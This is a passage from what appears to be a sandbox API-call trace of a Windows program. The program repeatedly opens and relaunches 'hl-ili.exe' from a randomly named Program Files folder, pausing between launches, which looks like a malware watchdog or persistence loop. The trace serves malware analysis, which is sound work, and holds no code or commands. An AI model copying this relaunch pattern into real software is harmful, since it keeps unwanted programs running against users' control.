(x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0317.459] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x978, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0317.460] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0317.460] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1daac0) returned 1 [0317.460] NtQueryInformationFile (in: FileHandle=0x978, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0317.460] NtClose (Handle=0x978) returned 0x0 [0317.460] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0317.461] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x978, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0317.461] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0317.461] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da900) returned 1 [0317.461] NtClose (Handle=0x978) returned 0x0 [0317.463] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x1d4c, hThread=0x978, dwProcessId=0x848, dwThreadId=0xd18), hNewToken=0x0) returned 1 [0317.539] Sleep (dwMilliseconds=0x1388) [0317.541] Sleep (dwMilliseconds=0x1388) [0317.543] Sleep (dwMilliseconds=0x1388) [0317.544] Sleep (dwMilliseconds=0x1388) [0317.549] Sleep (dwMilliseconds=0x1388) [0317.551] Sleep (dwMilliseconds=0x1388) [0317.552] Sleep (dwMilliseconds=0x1388) [0317.554] Sleep (dwMilliseconds=0x1388) [0317.555] Sleep (dwMilliseconds=0x1388) [0317.557] Sleep (dwMilliseconds=0x1388) [0317.559] Sleep (dwMilliseconds=0x1388) [0317.566] Sleep (dwMilliseconds=0x1388) [0317.567] Sleep (dwMilliseconds=0x1388) [0317.569] Sleep (dwMilliseconds=0x1388) [0317.571] Sleep (dwMilliseconds=0x1388) [0317.572] Sleep (dwMilliseconds=0x1388) [0317.574] Sleep (dwMilliseconds=0x1388) [0317.575] Sleep (dwMilliseconds=0x1388) [0317.577] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0317.577] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1fc0, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0317.582] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0317.582] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1daac0) returned 1 [0317.582] NtQueryInformationFile (in: FileHandle=0x1fc0, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0317.582] NtClose (Handle=0x1fc0) returned 0x0 [0317.582] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0317.582] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1fc0, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0317.582] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0317.583] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9b70) returned 1 [0317.583] NtClose (Handle=0x1fc0) returned 0x0 [0317.586] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x1d08, hThread=0x1fc0, dwProcessId=0x12d4, dwThreadId=0x13ac), hNewToken=0x0) returned 1 [0318.519] Sleep (dwMilliseconds=0x1388) [0318.609] Sleep (dwMilliseconds=0x1388) [0318.687] Sleep (dwMilliseconds=0x1388) [0318.786] Sleep (dwMilliseconds=0x1388) [0318.886] Sleep (dwMilliseconds=0x1388) [0318.930] Sleep (dwMilliseconds=0x1388) [0318.972] Sleep (dwMilliseconds=0x1388) [0318.981] Sleep (dwMilliseconds=0x1388) [0318.992] Sleep (dwMilliseconds=0x1388) [0318.993] Sleep (dwMilliseconds=0x1388) [0318.995] Sleep (dwMilliseconds=0x1388) [0318.996] Sleep (dwMilliseconds=0x1388) [0319.002] Sleep (dwMilliseconds=0x1388) [0319.004] Sleep (dwMilliseconds=0x1388) [0319.005] Sleep (dwMilliseconds=0x1388) [0319.009] Sleep (dwMilliseconds=0x1388) [0319.010] Sleep (dwMilliseconds=0x1388) [0319.012] Sleep (dwMilliseconds=0x1388) [0319.013] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.013] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1c80, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.017] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.017] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9e80) returned 1 [0319.018] NtQueryInformationFile (in: FileHandle=0x1c80, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.018] NtClose (Handle=0x1c80) returned 0x0 [0319.019] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.019] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1c80, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.020] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.020] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da740) returned 1 [0319.020] NtClose (Handle=0x1c80) returned 0x0 [0319.023] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x1b68, hThread=0x1c80, dwProcessId=0xa80, dwThreadId=0x12d8), hNewToken=0x0) returned 1 [0319.043] Sleep (dwMilliseconds=0x1388) [0319.045] Sleep (dwMilliseconds=0x1388) [0319.048] Sleep (dwMilliseconds=0x1388) [0319.050] Sleep (dwMilliseconds=0x1388) [0319.051] Sleep (dwMilliseconds=0x1388) [0319.053] Sleep (dwMilliseconds=0x1388) [0319.054] Sleep (dwMilliseconds=0x1388) [0319.056] Sleep (dwMilliseconds=0x1388) [0319.057] Sleep (dwMilliseconds=0x1388) [0319.059] Sleep (dwMilliseconds=0x1388) [0319.060] Sleep (dwMilliseconds=0x1388) [0319.065] Sleep (dwMilliseconds=0x1388) [0319.068] Sleep (dwMilliseconds=0x1388) [0319.070] Sleep (dwMilliseconds=0x1388) [0319.071] Sleep (dwMilliseconds=0x1388) [0319.074] Sleep (dwMilliseconds=0x1388) [0319.076] Sleep (dwMilliseconds=0x1388) [0319.077] Sleep (dwMilliseconds=0x1388) [0319.082] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.082] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1da0, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.082] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.082] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9e80) returned 1 [0319.082] NtQueryInformationFile (in: FileHandle=0x1da0, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.082] NtClose (Handle=0x1da0) returned 0x0 [0319.082] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.082] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1da0, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.082] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.082] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da580) returned 1 [0319.082] NtClose (Handle=0x1da0) returned 0x0 [0319.085] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x21c8, hThread=0x1da0, dwProcessId=0x26c, dwThreadId=0x38c), hNewToken=0x0) returned 1 [0319.103] Sleep (dwMilliseconds=0x1388) [0319.105] Sleep (dwMilliseconds=0x1388) [0319.107] Sleep (dwMilliseconds=0x1388) [0319.109] Sleep (dwMilliseconds=0x1388) [0319.110] Sleep (dwMilliseconds=0x1388) [0319.112] Sleep (dwMilliseconds=0x1388) [0319.116] Sleep (dwMilliseconds=0x1388) [0319.117] Sleep (dwMilliseconds=0x1388) [0319.119] Sleep (dwMilliseconds=0x1388) [0319.120] Sleep (dwMilliseconds=0x1388) [0319.122] Sleep (dwMilliseconds=0x1388) [0319.123] Sleep (dwMilliseconds=0x1388) [0319.125] Sleep (dwMilliseconds=0x1388) [0319.126] Sleep (dwMilliseconds=0x1388) [0319.128] Sleep (dwMilliseconds=0x1388) [0319.132] Sleep (dwMilliseconds=0x1388) [0319.134] Sleep (dwMilliseconds=0x1388) [0319.135] Sleep (dwMilliseconds=0x1388) [0319.137] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.137] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1b0c, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.137] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.137] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9b70) returned 1 [0319.137] NtQueryInformationFile (in: FileHandle=0x1b0c, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.137] NtClose (Handle=0x1b0c) returned 0x0 [0319.137] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.137] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1b0c, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.137] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.137] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1dab30) returned 1 [0319.137] NtClose (Handle=0x1b0c) returned 0x0 [0319.140] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x1bf4, hThread=0x1b0c, dwProcessId=0xc3c, dwThreadId=0x1298), hNewToken=0x0) returned 1 [0319.157] Sleep (dwMilliseconds=0x1388) [0319.159] Sleep (dwMilliseconds=0x1388) [0319.160] Sleep (dwMilliseconds=0x1388) [0319.164] Sleep (dwMilliseconds=0x1388) [0319.166] Sleep (dwMilliseconds=0x1388) [0319.177] Sleep (dwMilliseconds=0x1388) [0319.190] Sleep (dwMilliseconds=0x1388) [0319.191] Sleep (dwMilliseconds=0x1388) [0319.193] Sleep (dwMilliseconds=0x1388) [0319.194] Sleep (dwMilliseconds=0x1388) [0319.196] Sleep (dwMilliseconds=0x1388) [0319.197] Sleep (dwMilliseconds=0x1388) [0319.206] Sleep (dwMilliseconds=0x1388) [0319.208] Sleep (dwMilliseconds=0x1388) [0319.209] Sleep (dwMilliseconds=0x1388) [0319.211] Sleep (dwMilliseconds=0x1388) [0319.212] Sleep (dwMilliseconds=0x1388) [0319.214] Sleep (dwMilliseconds=0x1388) [0319.222] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.222] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x974, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.222] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.222] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9470) returned 1 [0319.222] NtQueryInformationFile (in: FileHandle=0x974, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.222] NtClose (Handle=0x974) returned 0x0 [0319.223] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.223] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x974, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.223] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.223] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9b70) returned 1 [0319.223] NtClose (Handle=0x974) returned 0x0 [0319.226] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x96c, hThread=0x974, dwProcessId=0x13c4, dwThreadId=0x11d4), hNewToken=0x0) returned 1 [0319.252] Sleep (dwMilliseconds=0x1388) [0319.253] Sleep (dwMilliseconds=0x1388) [0319.255] Sleep (dwMilliseconds=0x1388) [0319.260] Sleep (dwMilliseconds=0x1388) [0319.261] Sleep (dwMilliseconds=0x1388) [0319.268] Sleep (dwMilliseconds=0x1388) [0319.269] Sleep (dwMilliseconds=0x1388) [0319.271] Sleep (dwMilliseconds=0x1388) [0319.272] Sleep (dwMilliseconds=0x1388) [0319.274] Sleep (dwMilliseconds=0x1388) [0319.275] Sleep (dwMilliseconds=0x1388) [0319.277] Sleep (dwMilliseconds=0x1388) [0319.278] Sleep (dwMilliseconds=0x1388) [0319.315] Sleep (dwMilliseconds=0x1388) [0319.317] Sleep (dwMilliseconds=0x1388) [0319.319] Sleep (dwMilliseconds=0x1388) [0319.320] Sleep (dwMilliseconds=0x1388) [0319.322] Sleep (dwMilliseconds=0x1388) [0319.323] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.323] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x988, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.324] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.324] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da970) returned 1 [0319.324] NtQueryInformationFile (in: FileHandle=0x988, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.324] NtClose 